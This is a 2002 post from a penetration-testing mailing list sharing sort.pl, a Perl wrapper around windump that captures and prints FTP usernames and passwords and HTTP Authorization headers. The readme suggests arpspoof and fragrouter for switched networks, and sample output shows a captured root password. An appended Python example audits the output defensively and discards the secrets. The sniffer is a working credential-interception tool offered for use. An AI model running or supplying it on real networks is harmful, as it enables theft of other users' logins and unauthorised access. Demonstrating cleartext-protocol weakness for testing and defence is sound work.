Penetration Testing mailing list archives
Perl Script wrapper for Windump
From: "Susan Chan Lee" <susan.lee () securityassoc com>
Date: Thu, 28 Feb 16:36:05 2002 +0000
Hi

Just thought, this Perl script may be useful to you all.

This script is essentially a wrapper around windump and demonstrates the weaknesses of the FTP and HTTP protocols. It will cleanly capture and display all FTP and HTTP usernames and passwords and has been configured for Proxy support (port 8080 and 8088 - modify script for your specific requirements). It is most effective on hubbed networks. To use on switched networks use arpspoof and fragrouter or something similar for best results.

Thanks

Susan Chan Lee
Security Associates - Singapore

#!/usr/bin/perl
# Author: Susan Lee
# email: susan.lee () securityassoc com
# File: sort.pl
# Usage: perl sort.pl
$LIMIT = shift || 25000;
$|=1;
open (STDIN,"windump -lnx -s 1024 dst port 80 or 8080 or 8088 or 21 |");
while (<>) {
    # A line starting in column 0 is a windump packet header: a new packet begins.
    if (/^\S/) {
        last unless $LIMIT--;
        # Report matching request/response lines from the previous packet's payload.
        while ($packet=~/(USER|PASS|GET|POST|WWW-Authenticate|Authorization).+/g) {
            print "$client -> $host\t$&\n";
        }
        undef $client; undef $host; undef $packet;
        # Remember the endpoints only for PUSH segments that carry data.
        ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
            if /P \d+:\d+\((\d+)\)/ && $1 > 0;
    }
    next unless $client && $host;
    # Indented lines are the hex dump: convert hex pairs to characters,
    # drop non-printable bytes, and append to the current packet.
    s/\s+//;
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;
    tr/\x1F-\x7E\r\n//cd;
    $packet .= $_;
}
# End of Script

Readme File:

Tested successfully using ActiveState Perl (http://www.activestate.com).

This script is essentially a wrapper around windump and demonstrates the weaknesses of the FTP and HTTP protocols. It will cleanly capture and display all FTP and HTTP usernames and passwords and has been configured for Proxy support (port 8080 and 8088 - modify script for your specific requirements). It is most effective on hubbed networks. To use on switched networks use arpspoof and fragrouter or something similar for best results.

Sort.pl builds on a script written by Lincoln Stein. This script is a port to Windows and makes some other modifications.
This script is really a wrap around the Windump program, which needs to be installed and configured on your system for this script to work (http://netgroup-serv.polito.it/windump/). sort.pl assumes windump is in your system path.

If your system has multiple interfaces (including dial-up interfaces), then you'll need to tell windump which interface to listen on via the -i X command, where X is the number of the interface, and edit the script appropriately (line 8). Use the windump -D command to see all interfaces on your system.

An example is given below:

C:\Temp\ps>perl sort.pl
windump: listening on\Device\Packet_{1443C46F-E2B6-404F-9588-BB555B2E3764}
172.1.3.130 -> 172.1.4.231 USER root
172.1.3.130 -> 172.1.4.231 PASS london
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/ps.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/spacer.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/go.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/search.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/bg_area2.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/top.gif HTTP/1.1
493 packets received by filter
0 packets dropped by kernel

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
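Added example, not part of the original post or of sort.pl: a defender-side pass over output in the `client -> host<TAB>match` format shown above, counting cleartext credential exposures per client/server pair so those services can be moved to encrypted transports, without echoing the secrets. The sample lines, addresses and function names are constructed for illustration, and treating only FTP `PASS` and HTTP Basic as cleartext exposures is this example's assumption.

```python
import re
from collections import Counter

# Constructed sample in the "client -> host<TAB>match" format printed by sort.pl.
SAMPLE = (
    "windump: listening on (constructed banner line)\n"
    "192.0.2.10 -> 192.0.2.21\tUSER alice\n"
    "192.0.2.10 -> 192.0.2.21\tPASS example-secret\n"
    "192.0.2.11 -> 192.0.2.80\tGET http://intranet.example/index.html HTTP/1.1\n"
    "192.0.2.11 -> 192.0.2.80\tAuthorization: Basic ZXhhbXBsZTpleGFtcGxl\n"
    "192.0.2.11 -> 192.0.2.80\tAuthorization: Basic ZXhhbXBsZTpleGFtcGxl\n"
    '192.0.2.12 -> 192.0.2.80\tAuthorization: Digest username="bob", response="0"\n'
)

LINE = re.compile(r"^(\d+\.\d+\.\d+\.\d+) -> (\d+\.\d+\.\d+\.\d+)\t(.*)$")

def classify(match):
    """Return an exposure category for one captured line, or None."""
    if re.match(r"PASS\s+\S", match):
        return "ftp-cleartext-password"
    auth = re.match(r"Authorization:\s*(\w+)", match, re.IGNORECASE)
    # Basic is base64 encoding, not encryption; Digest does not send the password.
    if auth and auth.group(1).lower() == "basic":
        return "http-basic-auth"
    return None

def audit(lines):
    """Count exposures per (client, server, category); secrets are never stored."""
    findings = Counter()
    for line in lines:
        m = LINE.match(line.rstrip("\r\n"))
        if not m:
            continue  # banner and packet-statistics lines
        client, host, match = m.groups()
        category = classify(match)
        if category:
            findings[(client, host, category)] += 1
    return findings

def report(findings):
    """Format findings as sorted summary lines containing no credential values."""
    return [f"{c} -> {h}: {cat} x{n}" for (c, h, cat), n in sorted(findings.items())]

if __name__ == "__main__":
    print("\n".join(report(audit(SAMPLE.splitlines()))))
```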